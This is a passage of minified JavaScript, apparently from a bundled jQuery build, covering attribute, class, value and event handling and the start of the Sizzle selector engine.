b7!=="string"){b4=b7;b7=bS}b7=b7||"fx";while(b3--){b6=aw._data(b2[b3],b7+"queueHooks");if(b6&&b6.empty){e++;b6.empty.add(b5)}}b5();return b1.promise(b4)}});var az,r,aL=/[\t\r\n]/g,bp=/\r/g,aV=/^(?:input|select|textarea|button|object)$/i,aN=/^(?:a|area)$/i,aH=/^(?:checked|selected|autofocus|autoplay|async|controls|defer|disabled|hidden|loop|multiple|open|readonly|required|scoped)$/i,bD=/^(?:checked|selected)$/i,ah=aw.support.getSetAttribute,ai=aw.support.input;aw.fn.extend({attr:function(e,b1){return aw.access(this,aw.attr,e,b1,arguments.length>1)},removeAttr:function(e){return this.each(function(){aw.removeAttr(this,e)})},prop:function(e,b1){return aw.access(this,aw.prop,e,b1,arguments.length>1)},removeProp:function(e){e=aw.propFix[e]||e;return this.each(function(){try{this[e]=bS;delete this[e]}catch(b1){}})},addClass:function(b8){var e,b3,b2,b1,b5,b4=0,b6=this.length,b7=typeof b8==="string"&&b8;if(aw.isFunction(b8)){return this.each(function(b9){aw(this).addClass(b8.call(this,b9,this.className))})}if(b7){e=(b8||"").match(B)||[];for(;b4<b6;b4++){b3=this[b4];b2=b3.nodeType===1&&(b3.className?(" "+b3.className+" ").replace(aL," "):" ");if(b2){b5=0;while((b1=e[b5++])){if(b2.indexOf(" "+b1+" ")<0){b2+=b1+" "}}b3.className=aw.trim(b2)}}}return this},removeClass:function(b8){var e,b3,b2,b1,b5,b4=0,b6=this.length,b7=arguments.length===0||typeof b8==="string"&&b8;if(aw.isFunction(b8)){return this.each(function(b9){aw(this).removeClass(b8.call(this,b9,this.className))})}if(b7){e=(b8||"").match(B)||[];for(;b4<b6;b4++){b3=this[b4];b2=b3.nodeType===1&&(b3.className?(" "+b3.className+" ").replace(aL," "):"");if(b2){b5=0;while((b1=e[b5++])){while(b2.indexOf(" "+b1+" ")>=0){b2=b2.replace(" "+b1+" "," ")}}b3.className=b8?aw.trim(b2):""}}}return this},toggleClass:function(b3,b1){var b2=typeof b3,e=typeof b1==="boolean";if(aw.isFunction(b3)){return this.each(function(b4){aw(this).toggleClass(b3.call(this,b4,this.className,b1),b1)})}return this.each(function(){if(b2==="string"){var b4,b6=0,b7=aw(this),b8=b1,b5=b3.match(B)||[];while((b4=b5[b6++])){b8=e?b8:!b7.hasClass(b4);b7[b8?"addClass":"removeClass"](b4)}}else{if(b2==="undefined"||b2==="boolean"){if(this.className){aw._data(this,"__className__",this.className)}this.className=this.className||b3===false?"":aw._data(this,"__className__")||""}}})},hasClass:function(b3){var e=" "+b3+" ",b1=0,b2=this.length;for(;b1<b2;b1++){if(this[b1].nodeType===1&&(" "+this[b1].className+" ").replace(aL," ").indexOf(e)>=0){return true}}return false},val:function(b4){var b1,b3,b2,e=this[0];if(!arguments.length){if(e){b1=aw.valHooks[e.type]||aw.valHooks[e.nodeName.toLowerCase()];if(b1&&"get" in b1&&(b3=b1.get(e,"value"))!==bS){return b3}b3=e.value;return typeof b3==="string"?b3.replace(bp,""):b3==null?"":b3}return}b2=aw.isFunction(b4);return this.each(function(b5){var b7,b6=aw(this);if(this.nodeType!==1){return}if(b2){b7=b4.call(this,b5,b6.val())}else{b7=b4}if(b7==null){b7=""}else{if(typeof b7==="number"){b7+=""}else{if(aw.isArray(b7)){b7=aw.map(b7,function(b8){return b8==null?"":b8+""})}}}b1=aw.valHooks[this.type]||aw.valHooks[this.nodeName.toLowerCase()];if(!b1||!("set" in b1)||b1.set(this,b7,"value")===bS){this.value=b7}})}});aw.extend({valHooks:{option:{get:function(e){var b1=e.attributes.value;return !b1||b1.specified?e.value:e.text}},select:{get:function(e){var b7,b5,b6=e.options,b2=e.selectedIndex,b4=e.type==="select-one"||b2<0,b8=b4?null:[],b3=b4?b2+1:b6.length,b1=b2<0?b3:b4?b2:0;for(;b1<b3;b1++){b5=b6[b1];if((b5.selected||b1===b2)&&(aw.support.optDisabled?!b5.disabled:b5.getAttribute("disabled")===null)&&(!b5.parentNode.disabled||!aw.nodeName(b5.parentNode,"optgroup"))){b7=aw(b5).val();if(b4){return b7}b8.push(b7)}}return b8},set:function(e,b1){var b2=aw.makeArray(b1);aw(e).find("option").each(function(){this.selected=aw.inArray(aw(this).val(),b2)>=0});if(!b2.length){e.selectedIndex=-1}return b2}}},attr:function(e,b2,b6){var b5,b1,b3,b4=e.nodeType;if(!e||b4===3||b4===8||b4===2){return}if(typeof e.getAttribute==="undefined"){return aw.prop(e,b2,b6)}b3=b4!==1||!aw.isXMLDoc(e);if(b3){b2=b2.toLowerCase();b1=aw.attrHooks[b2]||(aH.test(b2)?r:az)}if(b6!==bS){if(b6===null){aw.removeAttr(e,b2)}else{if(b1&&b3&&"set" in b1&&(b5=b1.set(e,b6,b2))!==bS){return b5}else{e.setAttribute(b2,b6+"");return b6}}}else{if(b1&&b3&&"get" in b1&&(b5=b1.get(e,b2))!==null){return b5}else{if(typeof e.getAttribute!=="undefined"){b5=e.getAttribute(b2)}return b5==null?bS:b5}}},removeAttr:function(b1,b5){var b3,b4,b2=0,e=b5&&b5.match(B);if(e&&b1.nodeType===1){while((b3=e[b2++])){b4=aw.propFix[b3]||b3;if(aH.test(b3)){if(!ah&&bD.test(b3)){b1[aw.camelCase("default-"+b3)]=b1[b4]=false}else{b1[b4]=false}}else{aw.attr(b1,b3,"")}b1.removeAttribute(ah?b3:b4)}}},attrHooks:{type:{set:function(e,b2){if(!aw.support.radioValue&&b2==="radio"&&aw.nodeName(e,"input")){var b1=e.value;e.setAttribute("type",b2);if(b1){e.value=b1}return b2}}}},propFix:{tabindex:"tabIndex",readonly:"readOnly","for":"htmlFor","class":"className",maxlength:"maxLength",cellspacing:"cellSpacing",cellpadding:"cellPadding",rowspan:"rowSpan",colspan:"colSpan",usemap:"useMap",frameborder:"frameBorder",contenteditable:"contentEditable"},prop:function(e,b2,b6){var b5,b1,b3,b4=e.nodeType;if(!e||b4===3||b4===8||b4===2){return}b3=b4!==1||!aw.isXMLDoc(e);if(b3){b2=aw.propFix[b2]||b2;b1=aw.propHooks[b2]}if(b6!==bS){if(b1&&"set" in b1&&(b5=b1.set(e,b6,b2))!==bS){return b5}else{return(e[b2]=b6)}}else{if(b1&&"get" in b1&&(b5=b1.get(e,b2))!==null){return b5}else{return e[b2]}}},propHooks:{tabIndex:{get:function(b1){var e=b1.getAttributeNode("tabindex");return e&&e.specified?parseInt(e.value,10):aV.test(b1.nodeName)||aN.test(b1.nodeName)&&b1.href?0:bS}}}});r={get:function(b2,b3){var b4=aw.prop(b2,b3),e=typeof b4==="boolean"&&b2.getAttribute(b3),b1=typeof b4==="boolean"?ai&&ah?e!=null:bD.test(b3)?b2[aw.camelCase("default-"+b3)]:!!e:b2.getAttributeNode(b3);return b1&&b1.value!==false?b3.toLowerCase():bS},set:function(e,b2,b1){if(b2===false){aw.removeAttr(e,b1)}else{if(ai&&ah||!bD.test(b1)){e.setAttribute(!ah&&aw.propFix[b1]||b1,b1)}else{e[aw.camelCase("default-"+b1)]=e[b1]=true}}return b1}};if(!ai||!ah){aw.attrHooks.value={get:function(e,b1){var b2=e.getAttributeNode(b1);return aw.nodeName(e,"input")?e.defaultValue:b2&&b2.specified?b2.value:bS},set:function(e,b2,b1){if(aw.nodeName(e,"input")){e.defaultValue=b2}else{return az&&az.set(e,b2,b1)}}}}if(!ah){az=aw.valHooks.button={get:function(e,b1){var b2=e.getAttributeNode(b1);return b2&&(b1==="id"||b1==="name"||b1==="coords"?b2.value!=="":b2.specified)?b2.value:bS},set:function(e,b3,b1){var b2=e.getAttributeNode(b1);if(!b2){e.setAttributeNode((b2=e.ownerDocument.createAttribute(b1)))}b2.value=b3+="";return b1==="value"||b3===e.getAttribute(b1)?b3:bS}};aw.attrHooks.contenteditable={get:az.get,set:function(e,b2,b1){az.set(e,b2===""?false:b2,b1)}};aw.each(["width","height"],function(e,b1){aw.attrHooks[b1]=aw.extend(aw.attrHooks[b1],{set:function(b2,b3){if(b3===""){b2.setAttribute(b1,"auto");return b3}}})})}if(!aw.support.hrefNormalized){aw.each(["href","src","width","height"],function(e,b1){aw.attrHooks[b1]=aw.extend(aw.attrHooks[b1],{get:function(b2){var b3=b2.getAttribute(b1,2);return b3==null?bS:b3}})});aw.each(["href","src"],function(e,b1){aw.propHooks[b1]={get:function(b2){return b2.getAttribute(b1,4)}}})}if(!aw.support.style){aw.attrHooks.style={get:function(e){return e.style.cssText||bS},set:function(e,b1){return(e.style.cssText=b1+"")}}}if(!aw.support.optSelected){aw.propHooks.selected=aw.extend(aw.propHooks.selected,{get:function(e){var b1=e.parentNode;if(b1){b1.selectedIndex;if(b1.parentNode){b1.parentNode.selectedIndex}}return null}})}if(!aw.support.enctype){aw.propFix.enctype="encoding"}if(!aw.support.checkOn){aw.each(["radio","checkbox"],function(){aw.valHooks[this]={get:function(e){return e.getAttribute("value")===null?"on":e.value}}})}aw.each(["radio","checkbox"],function(){aw.valHooks[this]=aw.extend(aw.valHooks[this],{set:function(e,b1){if(aw.isArray(b1)){return(e.checked=aw.inArray(aw(e).val(),b1)>=0)}}})});var aX=/^(?:input|select|textarea)$/i,a5=/^key/,a9=/^(?:mouse|contextmenu)|click/,aW=/^(?:focusinfocus|focusoutblur)$/,bA=/^([^.]*)(?:\.(.+)|)$/;function aU(){return true}function aT(){return false}aw.event={global:{},add:function(b1,cg,b7,e,cb){var b6,b3,ce,b4,cd,b5,cc,b8,cf,b9,ca,b2=b1.nodeType!==3&&b1.nodeType!==8&&aw._data(b1);if(!b2){return}if(b7.handler){b6=b7;b7=b6.handler;cb=b6.selector}if(!b7.guid){b7.guid=aw.guid++}if(!(b4=b2.events)){b4=b2.events={}}if(!(b3=b2.handle)){b3=b2.handle=function(ch){return typeof aw!=="undefined"&&(!ch||aw.event.triggered!==ch.type)?aw.event.dispatch.apply(b3.elem,arguments):bS};b3.elem=b1}cg=(cg||"").match(B)||[""];cd=cg.length;while(cd--){ce=bA.exec(cg[cd])||[];cf=ca=ce[1];b9=(ce[2]||"").split(".").sort();cc=aw.event.special[cf]||{};cf=(cb?cc.delegateType:cc.bindType)||cf;cc=aw.event.special[cf]||{};b5=aw.extend({type:cf,origType:ca,data:e,handler:b7,guid:b7.guid,selector:cb,needsContext:cb&&aw.expr.match.needsContext.test(cb),namespace:b9.join(".")},b6);if(!(b8=b4[cf])){b8=b4[cf]=[];b8.delegateCount=0;if(!cc.setup||cc.setup.call(b1,e,b9,b3)===false){if(b1.addEventListener){b1.addEventListener(cf,b3,false)}else{if(b1.attachEvent){b1.attachEvent("on"+cf,b3)}}}}if(cc.add){cc.add.call(b1,b5);if(!b5.handler.guid){b5.handler.guid=b7.guid}}if(cb){b8.splice(b8.delegateCount++,0,b5)}else{b8.push(b5)}aw.event.global[cf]=true}b1=null},remove:function(e,cg,b4,cb,b7){var b6,b9,ce,b2,cd,b3,cc,b5,cf,b8,ca,b1=aw.hasData(e)&&aw._data(e);if(!b1||!(b2=b1.events)){return}cg=(cg||"").match(B)||[""];cd=cg.length;while(cd--){ce=bA.exec(cg[cd])||[];cf=ca=ce[1];b8=(ce[2]||"").split(".").sort();if(!cf){for(cf in b2){aw.event.remove(e,cf+cg[cd],b4,cb,true)}continue}cc=aw.event.special[cf]||{};cf=(cb?cc.delegateType:cc.bindType)||cf;b5=b2[cf]||[];ce=ce[2]&&new RegExp("(^|\\.)"+b8.join("\\.(?:.*\\.|)")+"(\\.|$)");b9=b6=b5.length;while(b6--){b3=b5[b6];if((b7||ca===b3.origType)&&(!b4||b4.guid===b3.guid)&&(!ce||ce.test(b3.namespace))&&(!cb||cb===b3.selector||cb==="**"&&b3.selector)){b5.splice(b6,1);if(b3.selector){b5.delegateCount--}if(cc.remove){cc.remove.call(e,b3)}}}if(b9&&!b5.length){if(!cc.teardown||cc.teardown.call(e,b8,b1.handle)===false){aw.removeEvent(e,cf,b1.handle)}delete b2[cf]}}if(aw.isEmptyObject(b2)){delete b1.handle;aw._removeData(e,"events")}},trigger:function(b6,b3,b5,cb){var b9,b2,ce,b1,cc,b8,cd,b7=[b5||V],cf=b6.type||b6,ca=b6.namespace?b6.namespace.split("."):[];b2=ce=b5=b5||V;if(b5.nodeType===3||b5.nodeType===8){return}if(aW.test(cf+aw.event.triggered)){return}if(cf.indexOf(".")>=0){ca=cf.split(".");cf=ca.shift();ca.sort()}cc=cf.indexOf(":")<0&&"on"+cf;b6=b6[aw.expando]?b6:new aw.Event(cf,typeof b6==="object"&&b6);b6.isTrigger=true;b6.namespace=ca.join(".");b6.namespace_re=b6.namespace?new RegExp("(^|\\.)"+ca.join("\\.(?:.*\\.|)")+"(\\.|$)"):null;b6.result=bS;if(!b6.target){b6.target=b5}b3=b3==null?[b6]:aw.makeArray(b3,[b6]);cd=aw.event.special[cf]||{};if(!cb&&cd.trigger&&cd.trigger.apply(b5,b3)===false){return}if(!cb&&!cd.noBubble&&!aw.isWindow(b5)){b1=cd.delegateType||cf;if(!aW.test(b1+cf)){b2=b2.parentNode}for(;b2;b2=b2.parentNode){b7.push(b2);ce=b2}if(ce===(b5.ownerDocument||V)){b7.push(ce.defaultView||ce.parentWindow||bU)}}b9=0;while((b2=b7[b9++])&&!b6.isPropagationStopped()){b6.type=b9>1?b1:cd.bindType||cf;b8=(aw._data(b2,"events")||{})[b6.type]&&aw._data(b2,"handle");if(b8){b8.apply(b2,b3)}b8=cc&&b2[cc];if(b8&&aw.acceptData(b2)&&b8.apply&&b8.apply(b2,b3)===false){b6.preventDefault()}}b6.type=cf;if(!cb&&!b6.isDefaultPrevented()){if((!cd._default||cd._default.apply(b5.ownerDocument,b3)===false)&&!(cf==="click"&&aw.nodeName(b5,"a"))&&aw.acceptData(b5)){if(cc&&b5[cf]&&!aw.isWindow(b5)){ce=b5[cc];if(ce){b5[cc]=null}aw.event.triggered=cf;try{b5[cf]()}catch(b4){}aw.event.triggered=bS;if(ce){b5[cc]=ce}}}}return b6.result},dispatch:function(b1){b1=aw.event.fix(b1);var b5,b6,b8,b7,b2,b3=[],e=C.call(arguments),b4=(aw._data(this,"events")||{})[b1.type]||[],b9=aw.event.special[b1.type]||{};e[0]=b1;b1.delegateTarget=this;if(b9.preDispatch&&b9.preDispatch.call(this,b1)===false){return}b3=aw.event.handlers.call(this,b1,b4);b5=0;while((b7=b3[b5++])&&!b1.isPropagationStopped()){b1.currentTarget=b7.elem;b6=0;while((b2=b7.handlers[b6++])&&!b1.isImmediatePropagationStopped()){if(!b1.namespace_re||b1.namespace_re.test(b2.namespace)){b1.handleObj=b2;b1.data=b2.data;b8=((aw.event.special[b2.origType]||{}).handle||b2.handler).apply(b7.elem,e);if(b8!==bS){if((b1.result=b8)===false){b1.preventDefault();b1.stopPropagation()}}}}}if(b9.postDispatch){b9.postDispatch.call(this,b1)}return b1.result},handlers:function(b2,b5){var b6,b7,b8,b3,b4=[],b1=b5.delegateCount,e=b2.target;if(b1&&e.nodeType&&(!b2.button||b2.type!=="click")){for(;e!=this;e=e.parentNode||this){if(e.disabled!==true||b2.type!=="click"){b7=[];for(b6=0;b6<b1;b6++){b3=b5[b6];b8=b3.selector+" ";if(b7[b8]===bS){b7[b8]=b3.needsContext?aw(b8,this).index(e)>=0:aw.find(b8,this,null,[e]).length}if(b7[b8]){b7.push(b3)}}if(b7.length){b4.push({elem:e,handlers:b7})}}}}if(b1<b5.length){b4.push({elem:this,handlers:b5.slice(b1)})}return b4},fix:function(b1){if(b1[aw.expando]){return b1}var b3,b5,b4=b1,b2=aw.event.fixHooks[b1.type]||{},e=b2.props?this.props.concat(b2.props):this.props;b1=new aw.Event(b4);b3=e.length;while(b3--){b5=e[b3];b1[b5]=b4[b5]}if(!b1.target){b1.target=b4.srcElement||V}if(b1.target.nodeType===3){b1.target=b1.target.parentNode}b1.metaKey=!!b1.metaKey;return b2.filter?b2.filter(b1,b4):b1},props:"altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(e,b1){if(e.which==null){e.which=b1.charCode!=null?b1.charCode:b1.keyCode}return e}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(b3,b6){var b4,b2,e,b1=b6.button,b5=b6.fromElement;if(b3.pageX==null&&b6.clientX!=null){b4=b3.target.ownerDocument||V;b2=b4.documentElement;e=b4.body;b3.pageX=b6.clientX+(b2&&b2.scrollLeft||e&&e.scrollLeft||0)-(b2&&b2.clientLeft||e&&e.clientLeft||0);b3.pageY=b6.clientY+(b2&&b2.scrollTop||e&&e.scrollTop||0)-(b2&&b2.clientTop||e&&e.clientTop||0)}if(!b3.relatedTarget&&b5){b3.relatedTarget=b5===b3.target?b6.toElement:b5}if(!b3.which&&b1!==bS){b3.which=(b1&1?1:(b1&2?3:(b1&4?2:0)))}return b3}},special:{load:{noBubble:true},click:{trigger:function(){if(aw.nodeName(this,"input")&&this.type==="checkbox"&&this.click){this.click();return false}}},focus:{trigger:function(){if(this!==V.activeElement&&this.focus){try{this.focus();return false}catch(b1){}}},delegateType:"focusin"},blur:{trigger:function(){if(this===V.activeElement&&this.blur){this.blur();return false}},delegateType:"focusout"},beforeunload:{postDispatch:function(e){if(e.result!==bS){e.originalEvent.returnValue=e.result}}}},simulate:function(b5,b3,b4,b1){var b2=aw.extend(new aw.Event(),b4,{type:b5,isSimulated:true,originalEvent:{}});if(b1){aw.event.trigger(b2,null,b3)}else{aw.event.dispatch.call(b3,b2)}if(b2.isDefaultPrevented()){b4.preventDefault()}}};aw.removeEvent=V.removeEventListener?function(e,b2,b1){if(e.removeEventListener){e.removeEventListener(b2,b1,false)}}:function(e,b3,b1){var b2="on"+b3;if(e.detachEvent){if(typeof e[b2]==="undefined"){e[b2]=null}e.detachEvent(b2,b1)}};aw.Event=function(b1,e){if(!(this instanceof aw.Event)){return new aw.Event(b1,e)}if(b1&&b1.type){this.originalEvent=b1;this.type=b1.type;this.isDefaultPrevented=(b1.defaultPrevented||b1.returnValue===false||b1.getPreventDefault&&b1.getPreventDefault())?aU:aT}else{this.type=b1}if(e){aw.extend(this,e)}this.timeStamp=b1&&b1.timeStamp||aw.now();this[aw.expando]=true};aw.Event.prototype={isDefaultPrevented:aT,isPropagationStopped:aT,isImmediatePropagationStopped:aT,preventDefault:function(){var b1=this.originalEvent;this.isDefaultPrevented=aU;if(!b1){return}if(b1.preventDefault){b1.preventDefault()}else{b1.returnValue=false}},stopPropagation:function(){var b1=this.originalEvent;this.isPropagationStopped=aU;if(!b1){return}if(b1.stopPropagation){b1.stopPropagation()}b1.cancelBubble=true},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=aU;this.stopPropagation()}};aw.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(b1,e){aw.event.special[b1]={delegateType:e,bindType:e,handle:function(b2){var b5,b6=this,b4=b2.relatedTarget,b3=b2.handleObj;if(!b4||(b4!==b6&&!aw.contains(b6,b4))){b2.type=b3.origType;b5=b3.handler.apply(this,arguments);b2.type=e}return b5}}});if(!aw.support.submitBubbles){aw.event.special.submit={setup:function(){if(aw.nodeName(this,"form")){return false}aw.event.add(this,"click._submit keypress._submit",function(b1){var b2=b1.target,b3=aw.nodeName(b2,"input")||aw.nodeName(b2,"button")?b2.form:bS;if(b3&&!aw._data(b3,"submitBubbles")){aw.event.add(b3,"submit._submit",function(e){e._submit_bubble=true});aw._data(b3,"submitBubbles",true)}})},postDispatch:function(e){if(e._submit_bubble){delete e._submit_bubble;if(this.parentNode&&!e.isTrigger){aw.event.simulate("submit",this.parentNode,e,true)}}},teardown:function(){if(aw.nodeName(this,"form")){return false}aw.event.remove(this,"._submit")}}}if(!aw.support.changeBubbles){aw.event.special.change={setup:function(){if(aX.test(this.nodeName)){if(this.type==="checkbox"||this.type==="radio"){aw.event.add(this,"propertychange._change",function(e){if(e.originalEvent.propertyName==="checked"){this._just_changed=true}});aw.event.add(this,"click._change",function(e){if(this._just_changed&&!e.isTrigger){this._just_changed=false}aw.event.simulate("change",this,e,true)})}return false}aw.event.add(this,"beforeactivate._change",function(b1){var b2=b1.target;if(aX.test(b2.nodeName)&&!aw._data(b2,"changeBubbles")){aw.event.add(b2,"change._change",function(e){if(this.parentNode&&!e.isSimulated&&!e.isTrigger){aw.event.simulate("change",this.parentNode,e,true)}});aw._data(b2,"changeBubbles",true)}})},handle:function(b1){var e=b1.target;if(this!==e||b1.isSimulated||b1.isTrigger||(e.type!=="radio"&&e.type!=="checkbox")){return b1.handleObj.handler.apply(this,arguments)}},teardown:function(){aw.event.remove(this,"._change");return !aX.test(this.nodeName)}}}if(!aw.support.focusinBubbles){aw.each({focus:"focusin",blur:"focusout"},function(b3,b1){var e=0,b2=function(b4){aw.event.simulate(b1,b4.target,aw.event.fix(b4),true)};aw.event.special[b1]={setup:function(){if(e++===0){V.addEventListener(b3,b2,true)}},teardown:function(){if(--e===0){V.removeEventListener(b3,b2,true)}}}})}aw.fn.extend({on:function(b6,b4,e,b1,b2){var b3,b5;if(typeof b6==="object"){if(typeof b4!=="string"){e=e||b4;b4=bS}for(b5 in b6){this.on(b5,b4,e,b6[b5],b2)}return this}if(e==null&&b1==null){b1=b4;e=b4=bS}else{if(b1==null){if(typeof b4==="string"){b1=e;e=bS}else{b1=e;e=b4;b4=bS}}}if(b1===false){b1=aT}else{if(!b1){return this}}if(b2===1){b3=b1;b1=function(b7){aw().off(b7);return b3.apply(this,arguments)};b1.guid=b3.guid||(b3.guid=aw.guid++)}return this.each(function(){aw.event.add(this,b6,b1,e,b4)})},one:function(b3,b2,e,b1){return this.on(b3,b2,e,b1,1)},off:function(b4,b2,e){var b1,b3;if(b4&&b4.preventDefault&&b4.handleObj){b1=b4.handleObj;aw(b4.delegateTarget).off(b1.namespace?b1.origType+"."+b1.namespace:b1.origType,b1.selector,b1.handler);return this}if(typeof b4==="object"){for(b3 in b4){this.off(b3,b2,b4[b3])}return this}if(b2===false||typeof b2==="function"){e=b2;b2=bS}if(e===false){e=aT}return this.each(function(){aw.event.remove(this,b4,e,b2)})},bind:function(b2,e,b1){return this.on(b2,null,e,b1)},unbind:function(b1,e){return this.off(b1,null,e)},delegate:function(b2,b3,e,b1){return this.on(b3,b2,e,b1)},undelegate:function(b1,b2,e){return arguments.length===1?this.off(b1,"**"):this.off(b2,b1||"**",e)},trigger:function(b1,e){return this.each(function(){aw.event.trigger(b1,e,this)})},triggerHandler:function(b2,e){var b1=this[0];if(b1){return aw.event.trigger(b2,e,b1,true)}},hover:function(b1,e){return this.mouseenter(b1).mouseleave(e||b1)}});aw.each(("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu").split(" "),function(e,b1){aw.fn[b1]=function(b2,b3){return arguments.length>0?this.on(b1,null,b2,b3):this.trigger(b1)};if(a5.test(b1)){aw.event.fixHooks[b1]=aw.event.keyHooks}if(a9.test(b1)){aw.event.fixHooks[b1]=aw.event.mouseHooks}}); /* * Sizzle CSS Selector Engine * Copyright 2012 jQuery Foundation and other contributors * Released under the MIT license * http://sizzlejs.com/ */ (function(de,dc){var cs,b5,co,cq,cw,b8,cr,cF,c0,ci,ch,cj,cM,cL,cA,cb,c6,cn="sizzle"+-(new Date()),cH=de.document,c8={},cg=0,ck=0,b7=cd(),c9=cd(),b9=cd(),c7=typeof dc,cC=1<<31,b2=[],cG=b2.pop,cJ=b2.push,c5=b2.slice,cu=b2.indexOf||function(e){var df=0,dg=this.length;for(;df<dg;df++){if(this[df]===e){return df}}return -1},dd="[\\x20\\t\\r\\n\\f]",b6="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",ct=b6.replace("w","w#"),cE="([*^$|!~]?=)",b4="\\["+dd+"*("+b6+")"+dd+"*(?:"+cE+dd+"*(?:(['\"])((?:\\\\.|[^\\\\])*?)\\3|("+ct+")|)|)"+dd+"*\\]",cI=":("+b6+")(?:\\(((['\"])((?:\\\\.|[^\\\\])*?)\\3|((?:\\\\.|[^\\\\()[\\]]|"+b4.replace(3,8)+")*)|.*)\\)|)",cX=new RegExp("^"+dd+"+|((?:^|[^\\\\])(?:\\\\.)*)"+dd+"+$","g"),cO=new RegExp("^"+dd+"*,"+dd+"*"),cN=new RegExp("^"+dd+"*([\\x20\\t\\r\\n\\f>+~])"+dd+"*"),cU=new RegExp(cI),cR=new RegExp("^"+ct+"$"),cB={ID:new RegExp("^#("+b6+")"),CLASS:new RegExp("^\\.("+b6+")"),NAME:new RegExp("^\\[name=['\"]?("+b6+")['\"]?\\]"),TAG:new RegExp("^("+b6.replace("w","w*")+")"),ATTR:new RegExp("^"+b4),PSEUDO:new RegExp("^"+cI),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+dd+"*(even|odd|(([+-]|)(\\d*)n|)"+dd+"*(?:([+-]|)"+dd+"*(\\d+)|))"+dd+"*\\)|)","i"),needsContext:new RegExp("^"+dd+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+dd+"*((?:-\\d)?\\d*)"+dd+"*\\)|)(?=[^-]|$)","i")},cW=/[\x20\t\r\n\f]*[+~]/,cT=/\{\s*\[native code\]\s*\}/,cV=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,cS=/^(?:input|select|textarea|button)$/i,cQ=/^h\d$/i,cP=/'|\\/g,cK=/\=[\x20\t\r\n\f]*([^'"\]]*)[\x20\t\r\n\f]*\]/g,cY=/\\([\da-fA-F]{1,6}[\x20\t\r\n\f]?|.)/g,cp=function(e,df){var dg="0x"+df-65536;return dg!==dg?df:dg<0?String.fromCharCode(dg+65536):String.fromCharCode(dg>>10|55296,dg&1023|56320)};try{c5.call(ch.childNodes,0)[0].nodeType}catch(cl){c5=function(df){var e,dg=[];for(;(e=this[df]);df++){dg.push(e)}return dg}}function cv(e){return cT.test(e+"")}function cd(){var e,df=[];return(e=function(dg,dh){if(df.push(dg+=" ")>co.cacheLength){delete e[df.shift()]}return(e[dg]=dh)})}function cx(e){e[cn]=true;return e}function b3(dh){var df=ci.createElement("div");try{return dh(df)}catch(dg){return false}finally{df=null}}function c4(dt,e,dr,ds){var dj,df,di,dn,dh,dg,dp,dm,dk,dl;if((e?e.ownerDocument||e:cH)!==ci){c0(e)}e=e||ci;dr=dr||[];if(!dt||typeof dt!=="string"){return dr}if((dn=e.nodeType)!==1&&dn!==9){return[]}if(!cj&&!ds){if((dj=cV.exec(dt))){if((di=dj[1])){if(dn===9){df=e.getElementById(di);if(df&&df.parentNode){if(df.id===di){dr.push(df);return dr}}else{return dr}}else{if(e.ownerDocument&&(df=e.ownerDocument.getElementById(di))&&cb(e,df)&&df.id===di){dr.push(df);return dr}}}else{if(dj[2]){cJ.apply(dr,c5.call(e.getElementsByTagName(dt),0));return dr}else{if((di=dj[3])&&c8.getByClassName&&e.getElementsByClassName){cJ.apply(dr,c5.call(e.getElementsByClassName(di),0));return dr}}}}if(c8.qsa&&!cM.test(dt)){dp=true;dm=cn;dk=e;dl=dn===9&&dt;if(dn===1&&e.nodeName.toLowerCase()!=="object"){dg=da(dt);if((dp=e.getAttribute("id"))){dm=dp.replace(cP,"\\$&")}else{e.setAttribute("id",dm)}dm="[id='"+dm+"'] ";dh=dg.length;while(dh--){dg[dh]=dm+db(dg[dh])}dk=cW.test(dt)&&e.parentNode||e;dl=dg.join(",")}if(dl){try{cJ.apply(dr,c5.call(dk.querySelectorAll(dl),0));return dr}catch(dq){}finally{if(!dp){e.removeAttribute("id")}}}}}return cZ(dt.replace(cX,"$1"),e,dr,ds)}cw=c4.isXML=function(df){var e=df&&(df.ownerDocument||df).documentElement;return e?e.nodeName!=="HTML":false};c0=c4.setDocument=function(df){var e=df?df.ownerDocument||df:cH;if(e===ci||e.nodeType!==9||!e.documentElement){return ci}ci=e;ch=e.documentElement;cj=cw(e);c8.tagNameNoComments=b3(function(dg){dg.appendChild(e.createComment(""));return !dg.getElementsByTagName("*").length});c8.attributes=b3(function(dg){dg.innerHTML="<select></select>";var dh=typeof dg.lastChild.getAttribute("multiple");return dh!=="boolean"&&dh!=="string"});c8.getByClassName=b3(function(dg){dg.innerHTML="<div class='hidden e'></div><div class='hidden'></div>";if(!dg.getElementsByClassName||!dg.getElementsByClassName("e").length){return false}dg.lastChild.className="e";return dg.getElementsByClassName("e").length===2});c8.getByName=b3(function(dg){dg.id=cn+0;dg.innerHTML="<a name='"+cn+"'></a><div name='"+cn+"'></div>";ch.insertBefore(dg,ch.firstChild);var dh=e.getElementsByName&&e.getElementsByName(cn).length===2+e.getElementsByName(cn+0).length;c8.getIdNotName=!e.getElementById(cn);ch.removeChild(dg);return dh});co.attrHandle=b3(function(dg){dg.innerHTML="<a href='#'></a>";return dg.firstChild&&typeof dg.firstChild.getAttribute!==c7&&dg.firstChild.getAttribute("href")==="#"})?{}:{href:function(dg){return dg.getAttribute("href",2)},type:function(dg){return dg.getAttribute("type")}};if(c8.getIdNotName){co.find.ID=function(dh,dg){if(typeof dg.getElementById!==c7&&!cj){var di=dg.getElementById(dh);return di&&di.parentNode?[di]:[]}};co.filter.ID=function(dh){var dg=dh.replace(cY,cp);return function(di){return di.getAttribute("id")===dg}}}else{co.find.ID=function(dh,dg){if(typeof dg.getElementById!==c7&&!cj){var di=dg.getElementById(dh);return di?di.id===dh||typeof di.getAttributeNode!==c7&&di.getAttributeNode("id").value===dh?[di]:dc:[]}};co.filter.ID=function(dh){var dg=dh.replace(cY,cp);return function(di){var dj=typeof di.getAttributeNode!==c7&&di.getAttributeNode("id");return 